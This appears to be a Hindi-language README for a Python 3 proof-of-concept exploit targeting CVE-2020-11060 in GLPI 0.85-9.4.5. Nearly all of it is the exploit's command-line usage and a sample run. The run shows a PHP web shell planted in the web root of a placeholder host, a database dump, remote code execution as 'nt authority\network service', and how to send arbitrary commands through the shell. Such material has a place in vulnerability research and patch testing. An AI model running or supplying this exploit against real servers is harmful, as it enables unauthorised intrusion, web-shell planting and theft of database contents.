
CVE 2020-11060 के लिए Python3 POC
यह स्क्रिप्ट GLPI संस्करण 0.85-9.4.5 में CVE-2020-11060 के लिए Python 3.x आधारित एक शोषण है।
मूल कार्यान्वयन: 0xdreadnaught
Python3 पुनर्लेखन: n3rada
ExploitDB में मूल PoC अब अप्रचलित हो चुका है क्योंकि इसमें Python 2.x का उपयोग किया गया था। नया संस्करण प्रस्तुत किया जा चुका है, और स्वीकृत होने पर यहाँ एक लिंक जोड़ा जाएगा। इन PoCs को बनाने के लिए उपयोग किया गया मूल भेद्यता अनुसंधान AlmondOffSec द्वारा किया गया था, और इसे यहाँ पाया जा सकता है।
python3 CVE-2020-11060.py --url 'http://<target URL>' --user <'user'> --password <'password'> --platform <win/nix> --offset <#>
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne' --user 'glpi_adm' --password 'Amvfd6565/432' --platform 'win' --offset 312
[+] GLPI Browser 'http://glpi.vul.ne' ('windows') को निम्न क्रेडेंशियल्स के साथ लक्षित कर रहा है: 'glpi_adm':'Amvfd6565/432'।
[+] लक्ष्य चालू है और प्रतिक्रिया दे रहा है।
[+] उपयोगकर्ता 'glpi_adm' लॉग इन है।
------------------------- परीक्षण संख्या 1 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
नेटवर्क आईडी हटा रहा है: 2413
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
नया ESSID: RCEe
[+] वर्तमान शेल नाम: bQznfdTr.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\bQznfdTr.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/bQznfdTr.php
[+] शेल आकार: 265
------------------------- परीक्षण संख्या 2 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
नेटवर्क आईडी हटा रहा है: 2414
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
नया ESSID: RCEee
[+] वर्तमान शेल नाम: HdqrmKtR.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\HdqrmKtR.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/HdqrmKtR.php
[+] शेल आकार: 13882
------------------------- परीक्षण संख्या 3 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
नेटवर्क आईडी हटा रहा है: 2415
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
नया ESSID: RCEeee
[+] वर्तमान शेल नाम: dwmfIJgN.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\dwmfIJgN.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/dwmfIJgN.php
[+] शेल आकार: 13885
------------------------- परीक्षण संख्या 4 -------------------------
[*] नेटवर्क मिटाए जा रहे हैं...
नेटवर्क आईडी हटा रहा है: 2416
[+] नेटवर्क बनाया गया
[+] नेटवर्क संशोधित किया जा रहा है
नया ESSID: RCEeeee
[+] वर्तमान शेल नाम: KmGsYHBw.php
[*] डेटाबेस को दूरस्थ रूप से डंप किया जा रहा है: C:\xampp\htdocs\sound\KmGsYHBw.php
[+] फ़ाइल 'डंप' की गई, इस पर उपलब्ध: http://glpi.vul.ne/sound/KmGsYHBw.php
[+] शेल आकार: 8369
------------------------------------------------------------------
[+] 4 परीक्षणों के बाद RCE मिला!
[+] आप दूरस्थ रूप से कमांड निष्पादित कर सकते हैं: nt authority\network service@WIN03
[+] इंजेक्ट करने के लिए वांछित कमांड के साथ इस टूल को फिर से चलाएँ:
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'desired_command_here'
उसके बाद, आप स्वतंत्र रूप से एक कमांड निष्पादित कर सकते हैं जैसे:
python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'whoami'
और यह वापस आएगा:
[*] 'http://glpi.vul.ne/sound/KmGsYHBw.php' से प्रतिक्रिया प्राप्त हुई:
nt authority\network service